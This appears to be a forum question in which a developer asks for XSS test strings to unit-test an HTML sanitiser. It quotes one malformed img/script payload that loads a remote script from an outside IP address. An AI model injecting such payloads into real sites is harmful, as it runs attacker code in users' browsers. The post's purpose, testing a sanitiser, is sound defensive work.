I’m looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here’s a nice example from Coding Horror

<img src=''http://www.a.com/a.jpg<script type=text/javascript  src='http://1.2.3.4:81/xss.js'>' /><<img  src=''http://www.a.com/a.jpg</script>' 

I know there’s a Mime Torture Test which comprises of several nested emails with attachments that’s used to test Mime decoders (if they can decode it properly, then they’ve been proven to work). I’m basically looking for an equivilent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.

If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they’d be gratefully received too.

Thanks in advance 🙂

Edit: Sorry if this wasn’t clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere – not just a browser.